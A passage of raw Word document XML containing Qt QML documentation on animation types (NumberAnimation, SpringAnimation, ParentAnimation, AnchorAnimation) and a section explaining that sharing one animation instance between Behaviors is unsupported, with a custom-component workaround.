            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>NumberAnimation</w:t>
        </w:r>
      </w:hyperlink>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color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>that provides smooth changes in animation when the target value changes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="0018577B" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2502" w:history="1">
        <w:r w:rsidR="0018577B" w:rsidRPr="00710B49">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>SpringAnimation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: provides a spring-like animation with specialized attributes such as</w:t>
      </w:r>
      <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2503" w:anchor="mass-prop" w:history="1">
        <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>mass</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2504" w:anchor="damping-prop" w:history="1">
        <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>damping</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2505" w:anchor="epsilon-prop" w:history="1">
        <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>epsilon</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="0018577B" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2506" w:history="1">
        <w:r w:rsidR="0018577B" w:rsidRPr="00710B49">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ParentAnimation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: used for animating a parent change (see</w:t>
      </w:r>
      <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2507" w:history="1">
        <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ParentChange</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="0018577B" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2508" w:history="1">
        <w:r w:rsidR="0018577B" w:rsidRPr="00710B49">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>AnchorAnimation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: used for animating an anchor change (see</w:t>
      </w:r>
      <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2509" w:history="1">
        <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>AnchorChanges</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="0018577B" w:rsidRDefault="0018577B" w:rsidP="009C0F4C">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2139" w:name="sharing-animation-instances"/>
      <w:bookmarkStart w:id="2140" w:name="_Toc483000992"/>
      <w:bookmarkStart w:id="2141" w:name="_Toc483003983"/>
      <w:bookmarkStart w:id="2142" w:name="_Toc483604334"/>
      <w:bookmarkStart w:id="2143" w:name="_Toc483605554"/>
      <w:bookmarkEnd w:id="2139"/>
      <w:r w:rsidRPr="009C0F4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sharing Animation Instances</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2140"/>
      <w:bookmarkEnd w:id="2141"/>
      <w:bookmarkEnd w:id="2142"/>
      <w:bookmarkEnd w:id="2143"/>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="0018577B" w:rsidRDefault="0018577B" w:rsidP="0018577B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE2C1C">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sharing animation instances between Transitions or Behaviors is not supported</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and may lead to </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2C1C">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>undefined behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. In the following example, changes to the Rectangle's position will most likely not be correctly animated.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="005A2BD2"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5A2BD2">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</w:t>
      </w:r>
      <w:r w:rsidRPr="005A2BD2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A2BD2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="008D4C56" w:rsidRDefault="0018577B" w:rsidP="0018577B">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bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="008D4C56">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// NOT SUPPORTED: this will not work correctly as both Behaviors</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com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// try to control a single animation instance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NumberAnimation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anim</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duration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300</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easing</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type</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Easing</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>InBack</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Behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on x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animation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anim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Behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on y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animation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anim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Fonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="009C0F4C">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>easiest fix is to repeat the</w:t>
      </w:r>
      <w:r w:rsidRPr="009C0F4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2510" w:history="1">
        <w:r w:rsidRPr="009C0F4C">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>NumberAnimation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009C0F4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009C0F4C">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for both Behaviors</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2C1C">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the repeated animation is </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2C1C">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rather complex</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, you might also consider creating a custom animation component and assigning an instance to each Behavior, for example:</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com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// MyNumberAnimation.qml</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="0018577B" w:rsidRDefault="0018577B" w:rsidP="0018577B">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NumberAnimation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id</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anim</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duration</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lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>300</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easing</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type</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Easing</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>InBack</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com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// main.qml</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</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Behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on x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MyNumberAnimation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Behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on y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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MyNumberAnimation</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r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w: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HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="0018577B" w:rsidRDefault="0018577B" w:rsidP="0018577B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>See also</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2511" w:history="1">
        <w:r w:rsidRPr="0018577B">
          <w:rPr>
